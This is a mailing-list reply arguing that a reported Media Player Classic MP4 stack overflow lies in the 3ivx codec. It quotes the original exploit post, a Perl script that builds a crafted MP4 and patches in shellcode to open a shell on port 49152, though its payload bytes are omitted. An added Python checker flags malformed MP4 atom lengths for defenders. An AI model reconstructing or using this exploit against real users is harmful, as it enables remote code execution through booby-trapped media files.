Re: Media Player Classic 6.4.9 MP4 Stack Overflow 0-day
Just to rehash this for my own clarity, and perhaps that of others, this is not a defect in Media Player Classic so much as a defect in the 3ivx codec. If one were to use a different codec to decode MP4 content this defect would not exist.
This is similar to a defect in the Adobe Acrobat Reader browser plugin being mislabeled as a defect in, oh say, Firefox with respect to .pdf files.
While I may use Media Player Classic to view MP4 content, I don't have the 3ivx codec installed (I use a different codec) and therefore am not at risk from this defect.
I've seen little coverage of this in the press, and of that little I've seen confusion on where the defect exists. Since, as far as I know, Media Player Classic does not ship with the 3ivx codec, there is no out-of-the-box risk.
----------
---Matthew
*********** REPLY SEPARATOR ***********
On 12/8/2007 at 1:54 AM gforce@operamail.com wrote:
>#!/bin/perl
>#
># Media Player Classic 6.4.9 MP4 Stack Overflow
>#
># 0-day discovered and exploited by SYS 49152
>#
># Tested on win XP SP2 ENG
># Shell on port 49152
>#
># usage:
># - download this codec in order to manage MP4 content:
># http://www.3ivx.com/coral/3ivx_d4_451_win.exe
>#
># - open the MP4 file with mplayerc.exe
>#
># SYS 49152
># gforce(put the @ here)operamail(put the . here)com
>#
># update:
># the latest 5.0.1 codec is still vulnerable
>
>use Archive::Zip qw( :ERROR_CODES :CONSTANTS );
>
>$zip_data = # code 724981
>
>my $shellcode = # code 724981
>
>open(code, ">tempzip.zip") || die "Can't Write temporary File\n";
>binmode (code);
>print code $zip_data;
>close (code);
>print "\nTemporary file ready, patching..\n";
>my $zip = Archive::Zip->new();
>$zip->read( 'tempzip.zip' ) ;
>$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' );
>open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary File\n";
>binmode (code);
>seek code,619,0;
>print code $shellcode;
>close (code);
>print "Shellcode added, have fun!\n";
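Added illustration, not part of Matthew's reply or of the quoted exploit: the crafted MP4 above is handed to the 3ivx codec untouched by the player, so a defender who cannot remove the codec can at least screen files structurally before they reach it. The checker below walks the MP4 atom tree and reports any atom whose declared length does not fit its container (the usual shape of a length-field bug feeding a fixed-size stack buffer); the sample files are constructed here and are not the real trigger file, and the container-atom list is an assumption covering the common cases.

```python
import struct

ATOM_HEADER = struct.Struct(">I4s")          # big-endian 32-bit size + fourcc
# Assumed set of container atoms whose payload is itself a list of atoms.
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"udta"}

def check_atoms(data, start=0, end=None, findings=None):
    """Walk the atom tree in data[start:end]; return a list of
    (offset, fourcc, problem) for every atom whose declared length does
    not fit its container. Atom payloads are never decoded."""
    if end is None:
        end = len(data)
    if findings is None:
        findings = []
    pos = start
    while pos < end:
        if end - pos < ATOM_HEADER.size:
            findings.append((pos, b"", "truncated atom header"))
            break
        size, fourcc = ATOM_HEADER.unpack_from(data, pos)
        header_len = ATOM_HEADER.size
        if size == 1:                          # 64-bit "largesize" follows
            if end - pos < 16:
                findings.append((pos, fourcc, "truncated largesize header"))
                break
            size = struct.unpack_from(">Q", data, pos + 8)[0]
            header_len = 16
        elif size == 0:                        # atom runs to end of container
            size = end - pos
        if size < header_len or size > end - pos:
            findings.append((pos, fourcc,
                             f"declared size {size} but only {end - pos} bytes remain"))
            break                              # offsets past this point are untrustworthy
        if fourcc in CONTAINERS:
            check_atoms(data, pos + header_len, pos + size, findings)
        pos += size
    return findings

def atom(fourcc, payload=b"", declared_size=None):
    """Build an atom; declared_size lets a sample forge a bad length field."""
    size = 8 + len(payload) if declared_size is None else declared_size
    return struct.pack(">I4s", size, fourcc) + payload

# Constructed samples: a well-formed skeleton, and one whose 'mvhd' claims
# far more bytes than its 'moov' parent actually holds.
GOOD_MP4 = atom(b"ftyp", b"isom\x00\x00\x02\x00") + atom(b"moov", atom(b"mvhd", b"\x00" * 100))
BAD_MP4 = atom(b"ftyp", b"isom\x00\x00\x02\x00") + atom(
    b"moov", atom(b"mvhd", b"\x00" * 100, declared_size=0x7FFFFFFF))

if __name__ == "__main__":
    for name, blob in (("good", GOOD_MP4), ("bad", BAD_MP4)):
        print(name, check_atoms(blob) or "structure consistent")
```

A clean result only means the length fields are self-consistent; it says nothing about the payload the codec then decodes.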